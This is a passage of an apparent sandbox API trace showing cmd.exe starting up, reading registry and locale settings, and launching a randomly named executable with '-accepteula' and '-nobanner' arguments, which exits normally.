lpData=0x28e878*=0x40, lpcbData=0x28e870*=0x4) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x40, lpcbData=0x28e870*=0x4) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x40, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.663] RegCloseKey (hKey=0x68) returned 0x0 [0182.663] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e86c | out: phkResult=0x28e86c*=0x68) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x40, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x1, lpcbData=0x28e870*=0x4) returned 0x0 [0182.663] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x1, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.664] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x0, lpcbData=0x28e870*=0x4) returned 0x0 [0182.664] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x9, lpcbData=0x28e870*=0x4) returned 0x0 [0182.664] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x4, lpData=0x28e878*=0x9, lpcbData=0x28e870*=0x4) returned 0x0 [0182.664] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e874, lpData=0x28e878, lpcbData=0x28e870*=0x1000 | out: lpType=0x28e874*=0x0, lpData=0x28e878*=0x9, lpcbData=0x28e870*=0x1000) returned 0x2 [0182.664] RegCloseKey (hKey=0x68) returned 0x0 [0182.664] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2d2 [0182.664] srand (_Seed=0x5f51e2d2) [0182.664] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" [0182.664] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" [0182.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0182.665] GetProcessHeap () returned 0x5d0000 [0182.665] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e44b0 [0182.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e44b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0182.665] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0182.666] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.666] GetProcessHeap () returned 0x5d0000 [0182.666] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e46c8 [0182.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f638 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0182.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f638, lpFilePart=0x28f634 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f634*="Desktop") returned 0x25 [0182.666] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0182.666] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3b4 | out: lpFindFileData=0x28f3b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e2080 [0182.667] FindClose (in: hFindFile=0x5e2080 | out: hFindFile=0x5e2080) returned 1 [0182.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f3b4 | out: lpFindFileData=0x28f3b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e2080 [0182.667] FindClose (in: hFindFile=0x5e2080 | out: hFindFile=0x5e2080) returned 1 [0182.667] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0182.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f3b4 | out: lpFindFileData=0x28f3b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e2080 [0182.667] FindClose (in: hFindFile=0x5e2080 | out: hFindFile=0x5e2080) returned 1 [0182.667] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0182.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0182.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0182.667] GetProcessHeap () returned 0x5d0000 [0182.667] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2d90 | out: hHeap=0x5d0000) returned 1 [0182.668] GetEnvironmentStringsW () returned 0x5e2200* [0182.668] GetProcessHeap () returned 0x5d0000 [0182.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5e2d90 [0182.668] FreeEnvironmentStringsW (penv=0x5e2200) returned 1 [0182.668] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0182.668] GetProcessHeap () returned 0x5d0000 [0182.668] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e46c8 | out: hHeap=0x5d0000) returned 1 [0182.668] GetProcessHeap () returned 0x5d0000 [0182.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e4f28 [0182.668] GetProcessHeap () returned 0x5d0000 [0182.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x78) returned 0x5e8f58 [0182.669] GetProcessHeap () returned 0x5d0000 [0182.669] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4f28 | out: hHeap=0x5d0000) returned 1 [0182.669] GetConsoleOutputCP () returned 0x1b5 [0182.669] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0182.669] GetUserDefaultLCID () returned 0x409 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f778, cchData=128 | out: lpLCData="0") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f778, cchData=128 | out: lpLCData="0") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f778, cchData=128 | out: lpLCData="1") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0182.670] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0182.671] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.672] GetProcessHeap () returned 0x5d0000 [0182.672] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20c) returned 0x5e2200 [0182.672] GetConsoleTitleW (in: lpConsoleTitle=0x5e2200, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.672] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.673] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0182.673] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0182.673] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0182.674] GetProcessHeap () returned 0x5d0000 [0182.674] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400a) returned 0x5e4f28 [0182.674] GetProcessHeap () returned 0x5d0000 [0182.674] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4f28 | out: hHeap=0x5d0000) returned 1 [0182.676] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0182.676] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0182.676] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0182.676] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0182.676] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0182.676] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0182.676] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0182.676] GetProcessHeap () returned 0x5d0000 [0182.676] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e46c8 [0182.676] GetProcessHeap () returned 0x5d0000 [0182.676] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x22) returned 0x5e2418 [0182.678] GetProcessHeap () returned 0x5d0000 [0182.678] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x5c) returned 0x5e2448 [0182.679] GetConsoleTitleW (in: lpConsoleTitle=0x28f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.680] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0182.680] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0182.681] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0182.682] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0182.683] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0182.684] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0182.685] GetProcessHeap () returned 0x5d0000 [0182.685] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e24b0 [0182.686] GetProcessHeap () returned 0x5d0000 [0182.686] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x76) returned 0x5e8fd8 [0182.686] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0182.686] GetProcessHeap () returned 0x5d0000 [0182.686] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x418) returned 0x5e26c8 [0182.686] SetErrorMode (uMode=0x0) returned 0x0 [0182.686] SetErrorMode (uMode=0x1) returned 0x0 [0182.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5e26d0, lpFilePart=0x28ef90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28ef90*="Desktop") returned 0x25 [0182.686] SetErrorMode (uMode=0x0) returned 0x1 [0182.686] GetProcessHeap () returned 0x5d0000 [0182.687] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e26c8, Size=0x6e) returned 0x5e26c8 [0182.687] GetProcessHeap () returned 0x5d0000 [0182.687] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e26c8) returned 0x6e [0182.687] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.687] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.687] GetProcessHeap () returned 0x5d0000 [0182.687] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x120) returned 0x5e2740 [0182.687] GetProcessHeap () returned 0x5d0000 [0182.687] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x238) returned 0x5e2868 [0183.814] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0183.815] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x28ed2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ed2c) returned 0x5e2a18 [0183.815] GetProcessHeap () returned 0x5d0000 [0183.815] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e2a58 [0183.815] FindClose (in: hFindFile=0x5e2a18 | out: hFindFile=0x5e2a18) returned 1 [0183.815] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0183.815] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0183.815] GetConsoleTitleW (in: lpConsoleTitle=0x28f204, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.816] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f08c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f154 | out: lpAttributeList=0x28f08c, lpSize=0x28f154) returned 1 [0183.816] UpdateProcThreadAttribute (in: lpAttributeList=0x28f08c, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f14c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f08c, lpPreviousValue=0x0) returned 1 [0183.816] GetStartupInfoW (in: lpStartupInfo=0x28f048 | out: lpStartupInfo=0x28f048*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0183.816] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.818] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28f0e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f134 | out: lpCommandLine="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessInformation=0x28f134*(hProcess=0x78, hThread=0x74, dwProcessId=0x3f8, dwThreadId=0x3c4)) returned 1 [0183.846] CloseHandle (hObject=0x74) returned 1 [0183.846] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.846] GetProcessHeap () returned 0x5d0000 [0183.846] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2d90 | out: hHeap=0x5d0000) returned 1 [0183.847] GetEnvironmentStringsW () returned 0x5e2cb8* [0183.847] GetProcessHeap () returned 0x5d0000 [0183.847] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5eaf40 [0183.847] FreeEnvironmentStringsW (penv=0x5e2cb8) returned 1 [0183.847] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0229.744] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x28f028 | out: lpExitCode=0x28f028*=0x0) returned 1 [0229.744] CloseHandle (hObject=0x78) returned 1 [0229.745] _vsnwprintf (in: _Buffer=0x28f170, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f034 | out: _Buffer="00000000") returned 8 [0229.745] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0229.745] GetProcessHeap () returned 0x5d0000 [0229.745] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5eaf40 | out: hHeap=0x5d0000) returned 1 [0229.746] GetEnvironmentStringsW () returned 0x5e2cb8* [0229.746] GetProcessHeap () returned 0x5d0000 [0229.746] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5eaf40 [0229.746] FreeEnvironmentStringsW (penv=0x5e2cb8) returned 1 